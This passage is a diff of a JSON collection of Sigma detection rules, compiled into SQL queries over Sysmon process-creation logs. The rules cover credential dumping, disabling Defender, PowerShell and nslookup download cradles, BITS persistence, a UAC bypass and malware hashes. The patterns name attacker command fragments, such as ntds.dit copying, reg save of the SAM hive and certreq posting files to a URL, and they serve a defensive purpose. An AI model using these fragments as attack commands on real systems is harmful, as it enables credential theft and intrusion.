'%SHA256=5bf80b871278a29f356bd42af1e35428aead20cd90b0c7642247afcaaa95b022%' ESCAPE '\\' OR Hashes LIKE '%SHA256=6f690ccfd54c2b02f0c3cb89c938162c10cbeee693286e809579c540b07ed883%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3c884f776fbd16597c072afd81029e8764dd57ee79d798829ca111f5e170bd8e%' ESCAPE '\\' OR Hashes LIKE '%SHA256=1922a419f57afb351b58330ed456143cc8de8b3ebcbd236d26a219b03b3464d7%' ESCAPE '\\' OR Hashes LIKE '%SHA256=fe0e4ef832b62d49b43433e10c47dc51072959af93963c790892efc20ec422f1%' ESCAPE '\\' OR Hashes LIKE '%SHA256=7ce9e1c5562c8a5c93878629a47fe6071a35d604ed57a8f918f3eadf82c11a9c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=178d5ee8c04401d332af331087a80fb4e5e2937edfba7266f9be34a5029b6945%' ESCAPE '\\' OR Hashes LIKE '%SHA256=51f70956fa8c487784fd21ab795f6ba2199b5c2d346acdeef1de0318a4c729d9%' ESCAPE '\\' OR Hashes LIKE '%SHA256=889bca95f1a69e94aaade1e959ed0d3620531dc0fc563be9a8decf41899b4d79%' ESCAPE '\\' OR Hashes LIKE '%SHA256=332ddaa00e2eb862742cb8d7e24ce52a5d38ffb22f6c8bd51162bd35e84d7ddf%' ESCAPE '\\' OR Hashes LIKE '%SHA256=44bcf82fa536318622798504e8369e9dcdb32686b95fcb44579f0b4efa79df08%' ESCAPE '\\' OR Hashes LIKE '%SHA256=63552772fdd8c947712a2cff00dfe25c7a34133716784b6d486227384f8cf3ef%' ESCAPE '\\' OR Hashes LIKE '%SHA256=056744a3c371b5938d63c396fe094afce8fb153796a65afa5103e1bffd7ca070%' ESCAPE '\\' OR Hashes LIKE '%SHA1=53a44c2396d15c3a03723fa5e5db54cafd527635%' ESCAPE '\\' OR Hashes LIKE '%SHA1=9c5e496921e3bc882dc40694f1dcc3746a75db19%' ESCAPE '\\' OR Hashes LIKE '%SHA1=aeb573accfd95758550cf30bf04f389a92922844%' ESCAPE '\\' OR Hashes LIKE '%SHA1=79ef78a797403a4ed1a616c68e07fff868a8650a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4f6f38b4cec35e895d91c052b1f5a83d665c2196%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1e8c2cac2e4ce7cbd33c3858eb2e24531cb8a84d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=e841a63e47361a572db9a7334af459ddca11347a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c28f606df28a9bc8df75a4d5e5837fc5522dd34d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2e94b305d6812a9f96e6781c888e48c7fb157b6b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=dd44133716b8a241957b912fa6a02efde3ce3025%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8793bf166cb89eb55f0593404e4e933ab605e803%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a39b57032dbb2335499a51e13470a7cd5d86b138%' ESCAPE '\\' OR Hashes LIKE '%SHA1=41cc2b15c662bc001c0eb92f6cc222934f0beeea%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d209430d6af54792371174e70e27dd11d3def7a7%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1c6452026c56efd2c94cea7e0f671eb55515edb0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c6b41d3afdcdcaf9f442bbe772f5da871801fd5a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4923d460e22fbbf165bbbaba168e5a46b8157d9f%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f201504bd96e81d0d350c3a8332593ee1c9e09de%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ddd2db1127632a2a52943a2fe516a2e7d05d70d2%' ESCAPE '\\') OR sha256 IN ('9ae7c4a4e1cfe9b505c3a47e66551eb1357affee65bfefb0109d02f4e97c06dd', '7772d624e1aed327abcd24ce2068063da0e31bb1d5d3bf2841fc977e198c6c5b', '657fc7e6447e0065d488a7db2caab13071e44741875044f9024ca843fe4e86b5', '2ef157a97e28574356e1d871abf75deca7d7a1ea662f38b577a06dd039dbae29', '52fd7b90d7144ac448af4008be639d4d45c252e51823f4311011af3207a5fc77', 'a370e47cb97b35f1ae6590d14ada7561d22b4a73be0cb6df7e851d85054b1ac3', '5bf80b871278a29f356bd42af1e35428aead20cd90b0c7642247afcaaa95b022', '6f690ccfd54c2b02f0c3cb89c938162c10cbeee693286e809579c540b07ed883', '3c884f776fbd16597c072afd81029e8764dd57ee79d798829ca111f5e170bd8e', '1922a419f57afb351b58330ed456143cc8de8b3ebcbd236d26a219b03b3464d7', 'fe0e4ef832b62d49b43433e10c47dc51072959af93963c790892efc20ec422f1', '7ce9e1c5562c8a5c93878629a47fe6071a35d604ed57a8f918f3eadf82c11a9c', '178d5ee8c04401d332af331087a80fb4e5e2937edfba7266f9be34a5029b6945', '51f70956fa8c487784fd21ab795f6ba2199b5c2d346acdeef1de0318a4c729d9', '889bca95f1a69e94aaade1e959ed0d3620531dc0fc563be9a8decf41899b4d79', '332ddaa00e2eb862742cb8d7e24ce52a5d38ffb22f6c8bd51162bd35e84d7ddf', '44bcf82fa536318622798504e8369e9dcdb32686b95fcb44579f0b4efa79df08', '63552772fdd8c947712a2cff00dfe25c7a34133716784b6d486227384f8cf3ef', '056744a3c371b5938d63c396fe094afce8fb153796a65afa5103e1bffd7ca070') OR sha1 IN ('53a44c2396d15c3a03723fa5e5db54cafd527635', '9c5e496921e3bc882dc40694f1dcc3746a75db19', 'aeb573accfd95758550cf30bf04f389a92922844', '79ef78a797403a4ed1a616c68e07fff868a8650a', '4f6f38b4cec35e895d91c052b1f5a83d665c2196', '1e8c2cac2e4ce7cbd33c3858eb2e24531cb8a84d', 'e841a63e47361a572db9a7334af459ddca11347a', 'c28f606df28a9bc8df75a4d5e5837fc5522dd34d', '2e94b305d6812a9f96e6781c888e48c7fb157b6b', 'dd44133716b8a241957b912fa6a02efde3ce3025', '8793bf166cb89eb55f0593404e4e933ab605e803', 'a39b57032dbb2335499a51e13470a7cd5d86b138', '41cc2b15c662bc001c0eb92f6cc222934f0beeea', 'd209430d6af54792371174e70e27dd11d3def7a7', '1c6452026c56efd2c94cea7e0f671eb55515edb0', 'c6b41d3afdcdcaf9f442bbe772f5da871801fd5a', '4923d460e22fbbf165bbbaba168e5a46b8157d9f', 'f201504bd96e81d0d350c3a8332593ee1c9e09de', 'ddd2db1127632a2a52943a2fe516a2e7d05d70d2')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certreq.exe' ESCAPE '\\' OR OriginalFileName = 'CertReq.exe') AND (CommandLine LIKE '% -Post %' ESCAPE '\\' AND CommandLine LIKE '% -config %' ESCAPE '\\' AND CommandLine LIKE '% http%' ESCAPE '\\' AND CommandLine LIKE '% C:\\\\windows\\\\win.ini %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_gallium_iocs.yml" + "filename": "proc_creation_win_lolbin_susp_certreq_download.yml" }, { - "title": "Suspicious Workstation Locking via Rundll32", - "id": "3b5b0213-0460-4e3f-8937-3abf98ff7dcc", + "title": "Sysinternals PsService Execution", + "id": "3371f518-5fe3-4cf6-a14b-2a0ae3fd8a4f", "status": "experimental", - "description": "Detects a suspicious call to the user32.dll function that locks the user workstation", - "author": "frack113", + "description": "Detects usage of Sysinternals PsService which can be abused for service reconnaissance and tampering", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.discovery", + "attack.persistence", + "attack.t1543.003" ], "falsepositives": [ - "Scripts or links on the user desktop used to lock the workstation instead of Windows+L or the menu option" + "Legitimate use of PsService by an administrator" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%user32.dll,%' ESCAPE '\\' AND CommandLine LIKE '%LockWorkStation%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'psservice.exe' OR (Image LIKE '%\\\\PsService.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsService64.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_user32_dll.yml" + "filename": "proc_creation_win_sysinternals_psservice.yml" }, { - "title": "Suspicious CustomShellHost Execution", - "id": "84b14121-9d14-416e-800b-f3b829c5a14d", + "title": "Windows Binary Executed From WSL", + "id": "ed825c86-c009-4014-b413-b76003e33d35", "status": "experimental", - "description": "Detects the execution of CustomShellHost binary where the child isn't located in 'C:\\Windows\\explorer.exe'", + "description": "Detects the execution of Windows binaries from within a WSL instance. This could be used to masquerade parent-child relationships", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1216" + "attack.t1202" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\CustomShellHost.exe' ESCAPE '\\' AND NOT (Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image REGEXP '[a-zA-Z]:\\\\' AND CurrentDirectory LIKE '%\\\\\\\\wsl.localhost%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_customshellhost.yml" + "filename": "proc_creation_win_wsl_windows_binaries_execution.yml" }, { - "title": "Suspicious Process Patterns NTDS.DIT Exfil", - "id": "8bc64091-6875-4881-aaf9-7bd25b5dda08", + "title": "PUA - DefenderCheck Execution", + "id": "f0ca6c24-3225-47d5-b1f5-352bf07ecfa7", "status": "experimental", - "description": "Detects suspicious process patterns used in NTDS.DIT exfiltration", + "description": "Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion.", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.defense_evasion", + "attack.t1027.005" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((Image LIKE '%\\\\NTDSDump.exe' ESCAPE '\\' OR Image LIKE '%\\\\NTDSDumpEx.exe' ESCAPE '\\') OR (CommandLine LIKE '%ntds.dit%' ESCAPE '\\' AND CommandLine LIKE '%system.hiv%' ESCAPE '\\') OR CommandLine LIKE '%NTDSgrab.ps1%' ESCAPE '\\') OR (CommandLine LIKE '%ac i ntds%' ESCAPE '\\' AND CommandLine LIKE '%create full%' ESCAPE '\\') OR (CommandLine LIKE '%/c copy %' ESCAPE '\\' AND CommandLine LIKE '%\\\\windows\\\\ntds\\\\ntds.dit%' ESCAPE '\\') OR (CommandLine LIKE '%activate instance ntds%' ESCAPE '\\' AND CommandLine LIKE '%create full%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%ntds.dit%' ESCAPE '\\')) OR (CommandLine LIKE '%ntds.dit%' ESCAPE '\\' AND ((ParentImage LIKE '%\\\\apache%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\' OR ParentImage LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\apache%' ESCAPE '\\' OR Image LIKE '%\\\\tomcat%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\DefenderCheck.exe' ESCAPE '\\' OR Description = 'DefenderCheck'))" ], - "filename": "proc_creation_win_susp_ntds.yml" + "filename": "proc_creation_win_pua_defendercheck.yml" }, { - "title": "Potential Emotet Rundll32 Execution", - "id": "54e57ce3-0672-46eb-a402-2c0948d5e3e9", + "title": "Monitoring For Persistence Via BITS", + "id": "b9cbbc17-d00d-4e3d-a827-b06d03d2380d", "status": "test", - "description": "Detecting Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL", - "author": "FPT.EagleEye", + "description": "BITS will allow you to schedule a command to execute after a successful download to notify you that the job is finished. When the job runs on the system the command specified in the BITS job will be executed. This can be abused by actors to create a backdoor within the system and for persistence. It will be chained in a BITS job to schedule the download of malware/additional binaries and execute the program after being downloaded", + "author": "Sreeman", "tags": [ "attack.defense_evasion", - "attack.t1218.011" + "attack.t1197" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%,RunDLL' ESCAPE '\\' OR CommandLine LIKE '%,Control\\_RunDLL' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%.dll,Control\\_RunDLL' ESCAPE '\\' OR CommandLine LIKE '%.dll\",Control\\_RunDLL' ESCAPE '\\' OR CommandLine LIKE '%.dll'',Control\\_RunDLL' ESCAPE '\\')) OR (ParentImage LIKE '%\\\\tracker.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%bitsadmin%' ESCAPE '\\' AND CommandLine LIKE '%/SetNotifyCmdLine%' ESCAPE '\\' AND (CommandLine LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32.exe%' ESCAPE '\\')) OR (CommandLine LIKE '%bitsadmin%' ESCAPE '\\' AND CommandLine LIKE '%/Addfile%' ESCAPE '\\' AND (CommandLine LIKE '%http:%' ESCAPE '\\' OR CommandLine LIKE '%https:%' ESCAPE '\\' OR CommandLine LIKE '%ftp:%' ESCAPE '\\' OR CommandLine LIKE '%ftps:%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_malware_emotet_rundll32_execution.yml" + "filename": "proc_creation_win_bitsadmin_potential_persistence.yml" }, { - "title": "Lazarus Group Activity", - "id": "24c4d154-05a4-4b99-b57d-9b977472443a", + "title": "HackTool - SILENTTRINITY Stager Execution", + "id": "03552375-cc2c-4883-bbe4-7958d5a980be", "status": "test", - "description": "Detects different process execution behaviors as described in various threat reports on Lazarus group activity", - "author": "Florian Roth (Nextron Systems), wagga", + "description": "Detects SILENTTRINITY stager use via PE metadata", + "author": "Aleksey Potapov, oscd.community", "tags": [ - "attack.g0032", - "attack.execution", - "attack.t1059" + "attack.command_and_control", + "attack.t1071" ], "falsepositives": [ "Unlikely" ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%reg.exe save hklm\\\\sam \\%temp\\%\\\\~reg\\_sam.save%' ESCAPE '\\' OR CommandLine LIKE '%1q2w3e4r@#$@#$@#$%' ESCAPE '\\' OR CommandLine LIKE '% -hp1q2w3e4 %' ESCAPE '\\' OR CommandLine LIKE '%.dat data03 10000 -p %' ESCAPE '\\') OR (CommandLine LIKE '%netstat -aon | find %' ESCAPE '\\' AND CommandLine LIKE '%ESTA%' ESCAPE '\\' AND CommandLine LIKE '% > \\%temp\\%\\\\~%' ESCAPE '\\') OR (CommandLine LIKE '%.255 10 C:\\\\ProgramData\\\\IBM\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.DAT%' ESCAPE '\\') OR (CommandLine LIKE '% /c %' ESCAPE '\\' AND CommandLine LIKE '% -p 0x%' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\RECYCLER\\\\%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32 %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%.bin,%' ESCAPE '\\' OR CommandLine LIKE '%.tmp,%' ESCAPE '\\' OR CommandLine LIKE '%.dat,%' ESCAPE '\\' OR CommandLine LIKE '%.io,%' ESCAPE '\\' OR CommandLine LIKE '%.ini,%' ESCAPE '\\' OR CommandLine LIKE '%.db,%' ESCAPE '\\'))))" - ], - "filename": "proc_creation_win_apt_lazarus_group_activity.yml" - }, - { - "title": "Reg Disable Security Service", - "id": "5e95028c-5229-4214-afae-d653d573d0ec", - "status": "experimental", - "description": "Detects a suspicious reg.exe invocation that looks as if it would disable an important security service", - "author": "Florian Roth (Nextron Systems), John Lambert (idea), elhoim", - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "falsepositives": [ - "Unknown", - "Other security solution installers" - ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\') AND ((CommandLine LIKE '% /d 4%' ESCAPE '\\' AND CommandLine LIKE '% /v Start%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Sense%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WinDefend%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsMpSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\NisSrv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdBoot%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdNisDrv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdNisSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\wscsvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SecurityHealthService%' ESCAPE '\\' OR CommandLine LIKE '%\\\\wuauserv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\UsoSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdFilter%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppIDSvc%' ESCAPE '\\')) OR (CommandLine LIKE '% /d 1%' ESCAPE '\\' AND CommandLine LIKE '%Windows Defender%' ESCAPE '\\' AND (CommandLine LIKE '%DisableIOAVProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableOnAccessProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableRoutinelyTakingAction%' ESCAPE '\\' OR CommandLine LIKE '%DisableScanOnRealtimeEnable%' ESCAPE '\\' OR CommandLine LIKE '%DisableBlockAtFirstSeen%' ESCAPE '\\' OR CommandLine LIKE '%DisableBehaviorMonitoring%' ESCAPE '\\' OR CommandLine LIKE '%DisableEnhancedNotifications%' ESCAPE '\\' OR CommandLine LIKE '%DisableAntiSpyware%' ESCAPE '\\' OR CommandLine LIKE '%DisableAntiSpywareRealtimeProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableConfig%' ESCAPE '\\' OR CommandLine LIKE '%DisablePrivacyMode%' ESCAPE '\\' OR CommandLine LIKE '%SignatureDisableUpdateOnStartupWithoutEngine%' ESCAPE '\\' OR CommandLine LIKE '%DisableArchiveScanning%' ESCAPE '\\' OR CommandLine LIKE '%DisableIntrusionPreventionSystem%' ESCAPE '\\' OR CommandLine LIKE '%DisableScriptScanning%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Description LIKE '%st2stager%' ESCAPE '\\')" ], - "filename": "proc_creation_win_reg_disable_sec_services.yml" + "filename": "proc_creation_win_hktl_silenttrinity_stager.yml" }, { - "title": "WmiPrvSE Spawned PowerShell", - "id": "692f0bec-83ba-4d04-af7e-e884a96059b6", - "status": "stable", - "description": "Detects Powershell as a child of the WmiPrvSE process. Which could be a signe of remote access via WMI", - "author": "Markus Neis @Karneades", + "title": "VMToolsd Suspicious Child Process", + "id": "5687f942-867b-4578-ade7-1e341c46e99a", + "status": "experimental", + "description": "Detects suspicious child process creations of VMware Tools process which may indicate persistence setup", + "author": "behops, Bhabesh Raj", "tags": [ "attack.execution", - "attack.t1047", - "attack.t1059.001" + "attack.persistence", + "attack.t1059" ], "falsepositives": [ - "AppvClient", - "CCM" + "Legitimate use by administrator" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll'))) AND NOT ((CommandLine = 'null') OR (CommandLine = '')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll', 'RUNDLL32.EXE', 'REGSVR32.EXE', 'wscript.exe', 'cscript.exe'))) AND NOT ((CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\poweron-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\poweroff-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\resume-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\suspend-vm-default.bat%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmiprvse_spawns_powershell.yml" + "filename": "proc_creation_win_vmware_vmtoolsd_susp_child_process.yml" }, { - "title": "Suspicious Process Parents", - "id": "cbec226f-63d9-4eca-9f52-dfb6652f24df", + "title": "UAC Bypass via ICMLuaUtil", + "id": "49f2f17b-b4c8-4172-a68b-d5bf95d05130", "status": "experimental", - "description": "Detects suspicious parent processes that should not have any children or should only have a single possible child program", + "description": "Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface", "author": "Florian Roth (Nextron Systems)", - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\minesweeper.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\winver.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\bitsadmin.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\certutil.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\calc.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\notepad.exe' ESCAPE '\\') AND NOT (((Image LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR Image LIKE '%\\\\wermgr.exe' ESCAPE '\\' OR Image LIKE '%\\\\conhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\mmc.exe' ESCAPE '\\' OR Image LIKE '%\\\\win32calc.exe' ESCAPE '\\' OR Image LIKE '%\\\\notepad.exe' ESCAPE '\\')) OR (Image = '')))))" - ], - "filename": "proc_creation_win_susp_parents.yml" - }, - { - "title": "New User Created Via Net.EXE", - "id": "cd219ff3-fa99-45d4-8380-a7d15116c6dc", - "status": "test", - "description": "Identifies the creation of local users via the net.exe command.", - "author": "Endgame, JHasenbusch (adapted to Sigma for oscd.community)", "tags": [ - "attack.persistence", - "attack.t1136.001" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Legitimate user creation.", - "Better use event IDs for user creation rather than command line rules." + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '%user%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\dllhost.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '%/Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' OR ParentCommandLine LIKE '%/Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}%' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR OriginalFileName = 'WerFault.exe'))" ], - "filename": "proc_creation_win_net_user_add.yml" + "filename": "proc_creation_win_uac_bypass_icmluautil.yml" }, { - "title": "Use of W32tm as Timer", - "id": "6da2c9f5-7c53-401b-aacb-92c040ce1215", + "title": "Nslookup PowerShell Download Cradle - ProcessCreation", + "id": "1b3b01c7-84e9-4072-86e5-fc285a41ff23", "status": "experimental", - "description": "When configured with suitable command line arguments, w32tm can act as a delay mechanism", - "author": "frack113", + "description": "Detects suspicious powershell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1124" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\w32tm.exe' ESCAPE '\\' OR OriginalFileName = 'w32time.dll') AND (CommandLine LIKE '%/stripchart%' ESCAPE '\\' AND CommandLine LIKE '%/computer:%' ESCAPE '\\' AND CommandLine LIKE '%/period:%' ESCAPE '\\' AND CommandLine LIKE '%/dataonly%' ESCAPE '\\' AND CommandLine LIKE '%/samples:%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\nslookup.exe%' ESCAPE '\\' OR OriginalFileName LIKE '\\\\nslookup.exe' ESCAPE '\\') AND ((ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% -q=txt %' ESCAPE '\\' OR CommandLine LIKE '% -querytype=txt %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_w32tm.yml" + "filename": "proc_creation_win_nslookup_poweshell_download.yml" }, { - "title": "Bad Opsec Defaults Sacrificial Processes With Improper Arguments", - "id": "a7c3d773-caef-227e-a7e7-c2f13c622329", + "title": "Suspicious PowerShell Download and Execute Pattern", + "id": "e6c54d94-498c-4562-a37c-b469d8e9a275", "status": "experimental", - "description": "Detects attackers using tooling with bad opsec defaults.\nE.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run.\nOne trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.\n", - "author": "Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)", + "description": "Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Software installers that pull packages from remote systems and execute them" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\WerFault.exe' ESCAPE '\\' AND CommandLine LIKE '%WerFault.exe' ESCAPE '\\') OR (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' AND CommandLine LIKE '%regsvcs.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regasm.exe' ESCAPE '\\' AND CommandLine LIKE '%regasm.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE 